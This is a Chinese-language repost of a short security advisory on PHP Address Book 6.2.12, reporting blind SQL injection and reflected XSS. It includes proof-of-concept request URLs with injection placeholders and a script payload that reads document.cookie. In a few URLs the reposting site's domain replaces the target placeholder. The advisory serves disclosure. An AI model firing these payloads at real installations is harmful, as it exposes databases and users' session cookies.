来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: PHP Address Book 6.2.12 Multiple security vulnerabilities作者: Stefan Schurtz影响软件: Successfully tested on PHP Address Book 6.2.12开发者网址: http://sourceforge.net/proje......
标题: PHP Address Book 6.2.12 Multiple security vulnerabilities
作者: Stefan Schurtz 影响软件: Successfully tested on PHP Address Book 6.2.12 开发者网址: http://sourceforge.net/projects/php-addressbook/ 缺陷描述 ========================== PHP Address Book 6.2.12 is 含多个xss及sql注射问题 ================== 测试证明 ================== // 盲注 http://www.2cto.com /addressbook/edit.php?id=[sql-injection] http://www.2cto.com /addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection] http://[target]/addressbook/vcard.php?id=[sql-injection] // XSS http://[target]/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script> http://[target]/addressbook/index.php?group='"</script><script>alert(document.cookie)</script> www.2cto.com修复: 针对上述代码进行过滤相应页面 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com